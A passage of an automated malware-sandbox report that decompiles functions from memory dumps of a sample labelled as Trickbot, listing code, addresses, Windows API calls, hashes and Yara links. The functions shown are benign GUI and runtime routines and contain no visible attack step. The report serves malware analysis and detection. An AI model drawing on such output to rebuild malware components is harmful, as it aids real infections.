							if(( *(_t144 + 0x44d1e1) & 0x00000004) == 0) {
								GetCharWidthA( *(_t191 + 4), _t144, _t144,  &_v16);
								if(GetCharWidthA( *(_t191 + 8),  *_t167 & 0x000000ff,  *_t167 & 0x000000ff, _t193) == 0) {
									 *_t193 = _v120.tmAveCharWidth;
								}
								_t189 = _v16;
							} else {
								_t189 = _v176.tmAveCharWidth;
								 *_t193 = _v120.tmAveCharWidth;
							}
							_t190 = _t189 - _v176.tmOverhang;
							 *_t193 =  *_t193 - _v120.tmOverhang;
							_t149 =  *_t193;
							_a12 = _a12 + _t149;
							_v16 = _t190;
							if(_t193 != _a40) {
								asm("cdq");
								_t156 = _t149 - _t190 - _t190 >> 1;
								 *((intOrPtr*)(_t193 - 4)) =  *((intOrPtr*)(_t193 - 4)) + _t156;
								 *_t193 = _t149 - _t156;
							}
							_a36 = _a36 + 1;
							 *_a36 =  *_t167;
							if(( *(( *_t167 & 0x000000ff) + 0x44d1e1) & 0x00000004) != 0) {
								_a36 = _a36 + 1;
								 *_a36 = _t167[1];
								_t153 =  *_t193;
								_a12 = _a12 + _t153;
								_t193 =  &(_t193[1]);
								_v8 = _v8 + 1;
								 *_t193 = _t153;
							}
							_t193 =  &(_t193[1]);
						}
						_t142 = E00405BB8(_t167);
						_v8 = _v8 + 1;
						_t167 = _t142;
						if(_v8 >=  *_a16) {
							break;
						}
						_t185 = 0;
					}
					_t170 = _a8;
					goto L31;
				}
			}

0x00436843
0x00436849
0x00436855
0x00436865
0x0043686e
0x00436874
0x00436877
0x0043687a
0x0043687d
0x00436896
0x0043687f
0x00436886
0x0043688c
0x00436892
0x00436892
0x00436899
0x0043689b
0x0043689f
0x004368a2
0x004368a4
0x004368aa
0x004368ad
0x004368b0
0x004368b3
0x004368b6
0x004368bc
0x004368d4
0x004368da
0x004368dd
0x004368e2
0x004368be
0x004368c3
0x004368c3
0x004368bc
0x004368e8
0x004368ed
0x00436a2f
0x00436a37
0x00436a3b
0x00436a3e
0x00436a41
0x00436a46
0x00436a52
0x00436a61
0x00436a66
0x00436a66
0x00436a68
0x00436a6c
0x00436a78
0x00436a78
0x00436a8b
0x00436a8d
0x00436a91
0x00436a96
0x00436a9a
0x00436a9a
0x00436a57
0x00436a5a
0x00436a4b
0x00436a4b
0x00000000
0x00436a4b
0x00436a48
0x00000000
0x004368f3
0x004368f7
0x004368f7
0x004368fe
0x00436903
0x00436906
0x004369ca
0x004369d6
0x004369dd
0x004369ec
0x004369ec
0x004369f4
0x004369f6
0x00436a03
0x004369f8
0x004369fb
0x004369fb
0x00436a06
0x00436a09
0x00436a0f
0x00436919
0x00436919
0x00436923
0x0043693b
0x00436952
0x00436957
0x00436957
0x00436959
0x00436925
0x00436928
0x0043692e
0x0043692e
0x0043695f
0x00436965
0x00436967
0x00436969
0x0043696f
0x00436972
0x00436978
0x0043697b
0x0043697f
0x00436982
0x00436982
0x00436989
0x0043698c
0x00436998
0x004369a0
0x004369a3
0x004369a5
0x004369a7
0x004369aa
0x004369ad
0x004369b0
0x004369b0
0x004369b2
0x004369b2
0x00436a13
0x00436a18
0x00436a1f
0x00436a26
0x00000000
0x00000000
0x004368f5
0x004368f5
0x00436a2c
0x00000000
0x00436a2c

APIs

GetTextMetricsA.GDI32(?,?), ref: 00436849
GetTextMetricsA.GDI32(?,?), ref: 00436855
GetTextExtentPoint32A.GDI32(?,0043D910,00000001,?), ref: 00436865
GetTextAlign.GDI32(?), ref: 0043686E
GetCurrentPositionEx.GDI32(?,?), ref: 00436886
GetTabbedTextExtentA.USER32(?,0043D90C,00000001,00000000,00000000), ref: 004368D4
GetCharWidthA.GDI32(?,?,?,?), ref: 0043693B
GetCharWidthA.GDI32(?,00000000,00000000,?), ref: 0043694A
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004369CA
MoveToEx.GDI32(?,?,?,00000000), ref: 00436A78

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Text$Extent$CharMetricsPoint32Width$AlignCurrentMovePositionTabbed
String ID:
API String ID: 2070200100-0
Opcode ID: d512ed39c521d4131260e3782b7d57e5bf9cbda0613eb7769c8353c995261181
Instruction ID: 7a9c9ed6fd5e2c439b2c001a5e531eb82d642c4d2e7523edbeaf7e703dc4bc8d
Opcode Fuzzy Hash: d512ed39c521d4131260e3782b7d57e5bf9cbda0613eb7769c8353c995261181
Instruction Fuzzy Hash: EC9133B190020AEFDF04CFA8C984AAEBBF5FF0D304F15916AE859A7210D735AA51CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0042E0A5, Relevance: 15.1, APIs: 10, Instructions: 138
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0042E0A5(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t53;
				int _t58;
				int _t61;
				signed int _t65;
				int _t66;
				void* _t67;
				int _t69;
				intOrPtr _t73;
				int _t74;
				int _t75;
				intOrPtr* _t77;
				struct HMENU__* _t83;
				intOrPtr _t84;

				_t73 = __ecx;
				_v8 = __ecx;
				_t53 = E00422719( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t77 =  *((intOrPtr*)(__ecx + 0x68));
					_t84 = _a4;
					if(_t77 == 0) {
						L3:
						E0041BBAB( &_v48);
						_v36 = _t84;
						if( *((intOrPtr*)(E00432335() + 0x54)) !=  *(_t84 + 4)) {
							if(GetMenu( *(_t73 + 0x1c)) != 0) {
								_t67 = E00419DFD(_t73);
								if(_t67 != 0) {
									_t83 = GetMenu( *(_t67 + 0x1c));
									if(_t83 != 0) {
										_t69 = GetMenuItemCount(_t83);
										_t75 = 0;
										_a12 = _t69;
										if(_t69 > 0) {
											while(GetSubMenu(_t83, _t75) !=  *(_t84 + 4)) {
												_t75 = _t75 + 1;
												if(_t75 < _a12) {
													continue;
												} else {
												}
												goto L13;
											}
											_push(_t83);
											_v12 = E0041CF83();
										}
										L13:
										_t73 = _v8;
									}
								}
							}
						} else {
							_v12 = _t84;
						}
						_t53 = GetMenuItemCount( *(_t84 + 4));
						_v40 = _v40 & 0x00000000;
						_v16 = _t53;
						if(_t53 > 0) {
							do {
								_t58 = GetMenuItemID( *(_t84 + 4), _v40);
								_v44 = _t58;
								if(_t58 != 0) {
									if(_t58 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t73 + 0x3c)) != 0 && _t58 < 0xf000) {
											_push(1);
											_pop(0);
										}
										_push(0);
										goto L27;
									} else {
										_push(GetSubMenu( *(_t84 + 4), _v40));
										_t65 = E0041CF83();
										_v32 = _t65;
										if(_t65 != 0) {
											_t66 = GetMenuItemID( *(_t65 + 4), 0);
											_v44 = _t66;
											if(_t66 != 0 && _t66 != 0xffffffff) {
												_push(0);
												L27:
												_push(_t73);
												E0041BD70( &_v48);
												_t61 = GetMenuItemCount( *(_t84 + 4));
												_t74 = _t61;
												if(_t74 < _v16) {
													_v40 = _v40 + _t61 - _v16;
													while(_v40 < _t74 && GetMenuItemID( *(_t84 + 4), _v40) == _v44) {
														_v40 = _v40 + 1;
													}
												}
												_v16 = _t74;
												_t73 = _v8;
											}
										}
									}
								}
								_v40 = _v40 + 1;
								_t53 = _v40;
							} while (_t53 < _v16);
						}
					} else {
						_t53 =  *((intOrPtr*)( *_t77 + 0x74))(_t84, _a8, 0);
						if(_t53 == 0) {
							goto L3;
						}
					}
				}
				return _t53;
			}

0x0042e0ad
0x0042e0b0
0x0042e0b6
0x0042e0bf
0x0042e0c5
0x0042e0c8
0x0042e0cd
0x0042e0e2
0x0042e0e5
0x0042e0ea
0x0042e0f8
0x0042e10c
0x0042e110
0x0042e117
0x0042e11e
0x0042e122
0x0042e125
0x0042e12b
0x0042e12d
0x0042e132
0x0042e134
0x0042e141
0x0042e145
0x00000000
0x00000000
0x0042e147
0x00000000
0x0042e145
0x0042e149
0x0042e14f
0x0042e14f
0x0042e152
0x0042e152
0x0042e152
0x0042e122
0x0042e117
0x0042e0fa
0x0042e0fa
0x0042e0fa
0x0042e158
0x0042e15e
0x0042e162
0x0042e167
0x0042e173
0x0042e179
0x0042e17d
0x0042e180
0x0042e189
0x0042e1bb
0x0042e1c3
0x0042e1cc
0x0042e1ce
0x0042e1ce
0x0042e1d3
0x00000000
0x0042e18b
0x0042e197
0x0042e198
0x0042e19f
0x0042e1a2
0x0042e1a9
0x0042e1ad
0x0042e1b0
0x0042e1b7
0x0042e1d4
0x0042e1d4
0x0042e1d8
0x0042e1e0
0x0042e1e6
0x0042e1eb
0x0042e1f0
0x0042e1f3
0x0042e205
0x0042e205
0x0042e1f3
0x0042e20a
0x0042e20d
0x0042e20d
0x0042e1b0
0x0042e1a2
0x0042e189
0x0042e210
0x0042e213
0x0042e216
0x0042e173
0x0042e0cf
0x0042e0d7
0x0042e0dc
0x00000000
0x00000000
0x0042e0dc
0x0042e0cd
0x0042e223

APIs

Part of subcall function 00422719: GetFocus.USER32 ref: 0042271C
Part of subcall function 00422719: GetParent.USER32(00000000), ref: 00422743
Part of subcall function 00422719: GetWindowLongA.USER32(?,000000F0), ref: 0042275E
Part of subcall function 00422719: GetParent.USER32(?), ref: 0042276C
Part of subcall function 00422719: GetDesktopWindow.USER32 ref: 00422770
Part of subcall function 00422719: SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 00422784

GetMenu.USER32(?), ref: 0042E108
GetMenu.USER32(?), ref: 0042E11C
GetMenuItemCount.USER32(00000000), ref: 0042E125
GetSubMenu.USER32(00000000,00000000), ref: 0042E136
GetMenuItemCount.USER32(?), ref: 0042E158
GetMenuItemID.USER32(?,00000000), ref: 0042E179
GetSubMenu.USER32(?,00000000), ref: 0042E191
GetMenuItemID.USER32(?,00000000), ref: 0042E1A9
GetMenuItemCount.USER32(?), ref: 0042E1E0
GetMenuItemID.USER32(?,00000000), ref: 0042E1FE

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
String ID:
API String ID: 4186786570-0
Opcode ID: b21dad6bb477f6bc8d02b42cb8de0f2a7252d18070ae69ed7fc0c9e5332331bb
Instruction ID: ce1fb775b7e7e249fcd3a84db7769a6cd138d98829a453f8b38dfdd20dca4d90
Opcode Fuzzy Hash: b21dad6bb477f6bc8d02b42cb8de0f2a7252d18070ae69ed7fc0c9e5332331bb
Instruction Fuzzy Hash: 3C51A031A00214EFCF119FA6ED84BAEB7B9BF08300F60447AE512E6261D779DD51CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0042D085, Relevance: 15.1, APIs: 10, Instructions: 102
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E0042D085() {
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				int _t33;
				void* _t40;
				void* _t41;
				struct HWND__* _t46;
				struct HWND__* _t47;
				signed int _t48;
				signed int _t49;
				void* _t50;

				_t40 = _t41;
				 *(_t40 + 0xa0) =  *(_t40 + 0xa0) + 1;
				_t21 = _t40 + 0xa0;
				if( *(_t40 + 0xa0) > 1) {
					L18:
					return _t21;
				}
				 *((intOrPtr*)(_t50 + 0x14)) = E00419DFD(_t41);
				_t48 = 0;
				_t21 = GetWindow(GetDesktopWindow(), 5);
				_t46 = _t21;
				if(_t46 == 0) {
					goto L18;
				} else {
					goto L2;
				}
				do {
					L2:
					if(IsWindowEnabled(_t46) != 0) {
						_push(_t46);
						if(E00418874() != 0 && E0042D065( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t46) != 0 && SendMessageA(_t46, 0x36c, 0, 0) == 0) {
							_t48 = _t48 + 1;
						}
					}
					_t21 = GetWindow(_t46, 2);
					_t46 = _t21;
				} while (_t46 != 0);
				if(_t48 != 0) {
					 *(_t40 + 0xa4) = E0041BDEB(4 + _t48 * 4);
					_push(5);
					_t49 = 0;
					_push(GetDesktopWindow());
					while(1) {
						_t47 = GetWindow();
						if(_t47 == 0) {
							break;
						}
						if(IsWindowEnabled(_t47) != 0) {
							_push(_t47);
							if(E00418874() != 0 && E0042D065( *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x10)) + 0x1c)), _t47) != 0) {
								_t33 = SendMessageA(_t47, 0x36c, 0, 0);
								if(_t33 == 0) {
									EnableWindow(_t47, _t33);
									( *(_t40 + 0xa4))[_t49] = _t47;
									_t49 = _t49 + 1;
								}
							}
						}
						_push(2);
						_push(_t47);
					}
					_t21 =  *(_t40 + 0xa4);
					_t21[_t49] = _t21[_t49] & 0x00000000;
				}
			}

0x0042d087
0x0042d08b
0x0042d098
0x0042d09f
0x0042d19b
0x0042d1a0
0x0042d1a0
0x0042d0ac
0x0042d0b0
0x0042d0bf
0x0042d0c1
0x0042d0c5
0x00000000
0x00000000
0x00000000
0x00000000
0x0042d0cb
0x0042d0cb
0x0042d0d4
0x0042d0d6
0x0042d0de
0x0042d105
0x0042d105
0x0042d0de
0x0042d109
0x0042d10b
0x0042d10d
0x0042d113
0x0042d127
0x0042d12d
0x0042d12f
0x0042d137
0x0042d138
0x0042d13a
0x0042d13e
0x00000000
0x00000000
0x0042d149
0x0042d14b
0x0042d153
0x0042d170
0x0042d178
0x0042d17c
0x0042d188
0x0042d18b
0x0042d18b
0x0042d178
0x0042d153
0x0042d18c
0x0042d18e
0x0042d18e
0x0042d191
0x0042d197
0x0042d197

APIs

GetDesktopWindow.USER32 ref: 0042D0B2
GetWindow.USER32(00000000), ref: 0042D0BF
IsWindowEnabled.USER32(00000000), ref: 0042D0CC
SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 0042D0FB
GetWindow.USER32(00000000,00000002), ref: 0042D109
GetDesktopWindow.USER32 ref: 0042D131
GetWindow.USER32(00000000), ref: 0042D138
IsWindowEnabled.USER32(00000000), ref: 0042D141
SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 0042D170
EnableWindow.USER32(00000000,00000000), ref: 0042D17C

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$DesktopEnabledMessageSend$Enable
String ID:
API String ID: 2339141687-0
Opcode ID: 575be53366ca8c21fffe31b4c2ae39e49ccc076262894bd6eb44ad6d8bb032c4
Instruction ID: 684f3636350392492d75512719374e00d371a8ec544ee05bc3ea3ac8dcbe3cb4
Opcode Fuzzy Hash: 575be53366ca8c21fffe31b4c2ae39e49ccc076262894bd6eb44ad6d8bb032c4
Instruction Fuzzy Hash: 7231D431B023347FE721AF25AC45FBB3658AF02745F45003AFE41DA292DBA8CC0186AD

Uniqueness

Uniqueness Score: -1.00%

Function 004292DF, Relevance: 15.1, APIs: 10, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004292DF(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				int _t39;
				int _t42;
				int _t61;
				int _t64;
				void* _t66;
				long _t67;
				int _t69;

				_t67 = _a4;
				_t66 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t67);
				if(( *(_t67 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t66 + 0x1c),  &_v24);
					_t42 = _a4;
					_t69 = _v24.right - _v24.left;
					_t64 =  *(_t42 + 0x10);
					_t61 = _v24.bottom - _v24.top;
					_t39 =  *(_t42 + 0x14);
					_v8 = _t64;
					_a4 = _t39;
					if(_t64 != _t69 && ( *(_t66 + 0x65) & 0x00000004) != 0) {
						SetRect( &_v24, _t64 -  *0x44b308, 0, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t69 -  *0x44b308, 0, _t69, _a4);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						_t64 = _v8;
						_t39 = _a4;
					}
					if(_t39 != _t61 && ( *(_t66 + 0x65) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t39 -  *0x44b30c, _t64, _t39);
						InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t61 -  *0x44b30c, _v8, _t61);
						return InvalidateRect( *(_t66 + 0x1c),  &_v24, 1);
					}
				}
				return _t39;
			}

0x004292e7
0x004292ec
0x004292f5
0x004292ff
0x0042930c
0x00429315
0x00429318
0x0042931e
0x00429321
0x00429324
0x00429329
0x0042932c
0x0042932f
0x00429346
0x00429355
0x0042936c
0x0042937b
0x00429381
0x00429384
0x00429384
0x00429389
0x004293a6
0x004293b1
0x004293c8
0x00000000
0x004293d3
0x00429389
0x004293dd

APIs

DefWindowProcA.USER32(?,00000046,00000000,?), ref: 004292F5
GetWindowRect.USER32(?,?), ref: 0042930C
SetRect.USER32(?,?,00000000,?,?), ref: 00429346
InvalidateRect.USER32(?,?,00000001), ref: 00429355
SetRect.USER32(?,?,00000000,?,?), ref: 0042936C
InvalidateRect.USER32(?,?,00000001), ref: 0042937B
SetRect.USER32(?,00000000,?,?,?), ref: 004293A6
InvalidateRect.USER32(?,?,00000001), ref: 004293B1
SetRect.USER32(?,00000000,?,?,?), ref: 004293C8
InvalidateRect.USER32(?,?,00000001), ref: 004293D3

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Invalidate$Window$Proc
String ID:
API String ID: 570070710-0
Opcode ID: ef83807571e1cbdd609db15501e6faa9c319f24feb746e6c60099b857223ed54
Instruction ID: 605fb7ce47509bacdf85f3dc97e800f3151216dabef9d9aeeaa767b85a7e3567
Opcode Fuzzy Hash: ef83807571e1cbdd609db15501e6faa9c319f24feb746e6c60099b857223ed54
Instruction Fuzzy Hash: F431D976900219BBDF10CFA4DD89FAE7BBDFB08704F144125FA01A61A0D7B0AE55CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402D20, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 120COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040ED13

Part of subcall function 0040F8E9: EnterCriticalSection.KERNEL32(0044BED0,?,?,?,0040DD3D), ref: 0040F95B

Strings

LC, xrefs: 0040EE36, 0040EE6F
`C, xrefs: 0040ED5B, 0040EDD1
`C, xrefs: 0040ED97, 0040EE29, 0040EE69
LC, xrefs: 0040EE0E, 0040EE31, 0040EE47
LC, xrefs: 0040EDD9
`C, xrefs: 0040ED78, 0040EDF4
TC, xrefs: 0040EDB8, 0040EE00

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalEnterH_prologSection
String ID: LC$LC$LC$TC$`C$`C$`C
API String ID: 206681789-1816145022
Opcode ID: 2d26d9fa8773bd3e4b544101bf150cfde2853762f4052e6733cb9cdab8f0461b
Instruction ID: 031b02d6b9362480f5f86662834bd5df58bf562096781ab6874aec523a84ca38
Opcode Fuzzy Hash: 2d26d9fa8773bd3e4b544101bf150cfde2853762f4052e6733cb9cdab8f0461b
Instruction Fuzzy Hash: 6C413BB0B502159BEB109F5ACD81BAEB6E5EF54704F04487FB501BB3D1CBB9C9048B98

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB81, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 118COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040ED13

Part of subcall function 0040F8E9: EnterCriticalSection.KERNEL32(0044BED0,?,?,?,0040DD3D), ref: 0040F95B

Strings

LC, xrefs: 0040EE36, 0040EE6F
`C, xrefs: 0040ED5B, 0040EDD1
`C, xrefs: 0040ED97, 0040EE29, 0040EE69
LC, xrefs: 0040EE0E, 0040EE31, 0040EE47
LC, xrefs: 0040EDD9
`C, xrefs: 0040ED78, 0040EDF4
TC, xrefs: 0040EDB8, 0040EE00

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CriticalEnterH_prologSection
String ID: LC$LC$LC$TC$`C$`C$`C
API String ID: 206681789-1816145022
Opcode ID: 020ab9eb6b92901a34814251179857d2deb7fbf8fece653922950245d948cf38
Instruction ID: 93396243a3b78d42a05f0aec3d3cb5528afc00f5486e0746794ded7baf09afbb
Opcode Fuzzy Hash: 020ab9eb6b92901a34814251179857d2deb7fbf8fece653922950245d948cf38
Instruction Fuzzy Hash: 57414DB0B102199BEB149F5ACD81BAEB6E5EF54704F14487FB501BB3D1CBB8C9048B98

Uniqueness

Uniqueness Score: -1.00%

Function 004094D7, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 96%

			E004094D7(void* __edi, long _a4) {
				char _v164;
				char _v424;
				int _t17;
				long _t19;
				signed int _t42;
				long _t47;
				void* _t48;
				signed int _t54;
				void** _t56;
				void* _t57;

				_t48 = __edi;
				_t47 = _a4;
				_t42 = 0;
				_t17 = 0x4483a8;
				while(_t47 !=  *_t17) {
					_t17 = _t17 + 8;
					_t42 = _t42 + 1;
					if(_t17 < 0x448438) {
						continue;
					}
					break;
				}
				_t54 = _t42 << 3;
				_t2 = _t54 + 0x4483a8; // 0x4c000000
				if(_t47 ==  *_t2) {
					_t17 =  *0x44b74c; // 0x0
					if(_t17 == 1 || _t17 == 0 &&  *0x447ec4 == 1) {
						_t16 = _t54 + 0x4483ac; // 0x43e94c
						_t56 = _t16;
						_t19 = E00409BE0( *_t56);
						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
					} else {
						if(_t47 != 0xfc) {
							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
								E0040A840( &_v424, "<program name unknown>");
							}
							_push(_t48);
							_t49 =  &_v424;
							if(E00409BE0( &_v424) + 1 > 0x3c) {
								_t49 = E00409BE0( &_v424) +  &_v424 - 0x3b;
								E0040B920(E00409BE0( &_v424) +  &_v424 - 0x3b, "...", 3);
								_t57 = _t57 + 0x10;
							}
							E0040A840( &_v164, "Runtime Error!\n\nProgram: ");
							E0040A850( &_v164, _t49);
							E0040A850( &_v164, "\n\n");
							_t12 = _t54 + 0x4483ac; // 0x43e94c
							E0040A850( &_v164,  *_t12);
							_t17 = E0040B897( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
						}
					}
				}
				return _t17;
			}

0x004094d7
0x004094e0
0x004094e3
0x004094e5
0x004094ea
0x004094ee
0x004094f1
0x004094f7
0x00000000
0x00000000
0x00000000
0x004094f7
0x004094fc
0x004094ff
0x00409505
0x0040950b
0x00409513
0x00409604
0x00409604
0x0040960f
0x00409621
0x0040952a
0x00409530
0x0040954c
0x0040955a
0x00409560
0x00409567
0x00409569
0x00409579
0x00409594
0x0040959c
0x004095a1
0x004095a1
0x004095b0
0x004095bd
0x004095ce
0x004095d3
0x004095e0
0x004095f6
0x004095fe
0x00409530
0x00409513
0x00409629

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,j/@), ref: 00409544
GetStdHandle.KERNEL32(000000F4,0043E94C,00000000,00402F6A,00000000,j/@), ref: 0040961A
WriteFile.KERNEL32(00000000), ref: 00409621

Strings

Microsoft Visual C++ Runtime Library, xrefs: 004095F0
Runtime Error!Program: , xrefs: 004095AA
..., xrefs: 00409596
<program name unknown>, xrefs: 00409554
j/@, xrefs: 004094F9

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: File$HandleModuleNameWrite
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $j/@
API String ID: 3784150691-390610925
Opcode ID: 5aec98df34ffba037991e979872b23b4052796262f7dcc7c2ef97e69001ed7de
Instruction ID: 58891faf1d1ba7203e44f1e9e6a3bea50605c19b83389c9ee2f96a6d78c0c943
Opcode Fuzzy Hash: 5aec98df34ffba037991e979872b23b4052796262f7dcc7c2ef97e69001ed7de
Instruction Fuzzy Hash: 4D31D472A00209AEDF20EB61CC46F9A376CEF45704F10047BF540F61C2E6B9AD418B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A495, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041A495(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t28;
				struct HWND__* _t29;
				signed int _t33;
				void* _t36;
				void* _t40;
				void* _t43;

				_t28 = __ebx;
				_push(__ecx);
				_t36 = __ecx;
				_t40 = E00419DFD(__ecx);
				_t33 = _a4 & 0x0000fff0;
				_t14 = _t33 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t40 == 0) {
						L15:
						goto L16;
					} else {
						E0041B83C(_t40);
						L11:
						_push(1);
						_pop(0);
						L16:
						return 0;
					}
				}
				_t17 = _t14 - 0x10;
				if(_t17 == 0) {
					goto L12;
				}
				_t18 = _t17 - 0x10;
				if(_t18 == 0 || _t18 == 0xa0) {
					if(_t33 == 0xf060 || _a8 != 0) {
						if(_t40 != 0) {
							_push(_t28);
							_t29 =  *(_t36 + 0x1c);
							_v8 = GetFocus();
							E0041884D(_t43, SetActiveWindow( *(_t40 + 0x1c)));
							SendMessageA( *(_t40 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t29) != 0) {
								SetActiveWindow(_t29);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}

0x0041a495
0x0041a498
0x0041a49b
0x0041a4a5
0x0041a4a7
0x0041a4af
0x0041a4b4
0x0041a53b
0x0041a540
0x0041a54f
0x00000000
0x0041a546
0x0041a548
0x0041a536
0x0041a536
0x0041a538
0x0041a551
0x0041a554
0x0041a554
0x0041a540
0x0041a4ba
0x0041a4bd
0x00000000
0x00000000
0x0041a4bf
0x0041a4c2
0x0041a4d5
0x0041a4df
0x0041a4e1
0x0041a4e2
0x0041a4f4
0x0041a4fa
0x0041a50d
0x0041a51e
0x0041a521
0x0041a521
0x0041a52b
0x0041a530
0x0041a530
0x0041a52b
0x0041a4df
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetFocus.USER32 ref: 0041A4E5
